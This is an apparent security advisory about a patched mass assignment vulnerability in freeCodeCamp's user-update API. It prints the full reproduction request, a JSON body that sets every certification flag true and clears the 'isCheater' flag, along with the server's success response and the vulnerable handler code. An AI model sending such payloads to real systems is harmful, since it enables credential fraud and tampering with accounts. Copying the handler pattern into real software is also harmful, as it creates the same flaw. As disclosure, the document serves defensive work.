The freeCodeCamp application allowed authenticated users to update their own details. A mass assignment vulnerability was discovered which allowed users to update any field of their profile, including certifications.
An attacker could use this vulnerability to award themselves all certificates on freeCodeCamp, or to change other user properties such as the "isCheater" flag to false.
A new account was created in the freeCodeCamp development/staging environment. The following request was sent to the /update-user-flag endpoint:
PUT /update-user-flag HTTP/2
Host: api.freecodecamp.dev
Cookie: _csrf=lsCzfu4[...]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.freecodecamp.dev/
Csrf-Token: Tu0VHrwW-GJvZ4ly1sVEXjHxSzgPLLj99OLQ
Content-Type: application/json
Origin: https://www.freecodecamp.dev
Content-Length: 518
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
{
"name": "Mass Assignment",
"isCheater": false,
"isHonest": true,
"isInfosecCertV7":true,
"isApisMicroservicesCert":true,
"isBackEndCert":true,
"is2018DataVisCert":true,
"isDataVisCert":true,
"isFrontEndCert":true,
"isFullStackCert":true,
"isFrontEndLibsCert":true,
"isInfosecQaCert":true,
"isQaCertV7":true,
"isInfosecCertV7":true,
"isJsAlgoDataStructCert":true,
"isRelationalDatabaseCertV8":true,
"isRespWebDesignCert":true,
"isSciCompPyCertV7":true,
"isDataAnalysisPyCertV7":true,
"isMachineLearningPyCertV7":true
}
HTTP/2 200 OK
Date: Thu, 31 Mar 2022 18:10:45 GMT
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Vary: Origin, Accept-Encoding
Access-Control-Allow-Origin: https://www.freecodecamp.dev
Access-Control-Allow-Credentials: true
X-Fcc-Access-Token: eyJhbGciOi[...]
{"type":"success","message":"flash.updated-preferences"}
Afterwards, the user had all certificates listed on their profile, as shown in the screenshots below:
function updateUserFlag(req, res, next) {
const { user, body: update } = req;
return user.updateAttributes(update, createStandardHandler(req, res, next));
}
api.put('/update-user-flag', ifNoUser401, updateUserFlag);
Patched and deployed to the latest staging and production versions.
Description
The freeCodeCamp application allowed authenticated users to update their own details. A mass assignment vulnerability was discovered which allowed users to update any field of their profile, including certifications.
Impact
An attacker could use this vulnerability to award themselves all certificates on freeCodeCamp, or to change other user properties such as the "isCheater" flag to false.
Reproduction
A new account was created in the freeCodeCamp development/staging environment. The following request was sent to the /update-user-flag endpoint:
Request:
Response:
Afterwards, the user had all certificates listed on their profile, as shown in the screenshots below:
The origin of the finding was at https://github.com/freeCodeCamp/freeCodeCamp/blob/main/api-server/src/server/boot/settings.js#L207:
The updateUserFlag() function updated all user attributes in the body of the request. The function was added as an API handler at https://github.com/freeCodeCamp/freeCodeCamp/blob/main/api-server/src/server/boot/settings.js#L39:
Patches
Patched and deployed to the latest staging and production versions.
Workarounds
Not Applicable
Credits
This security concern was identified by Laurence Tennant working with IncludeSecurity.com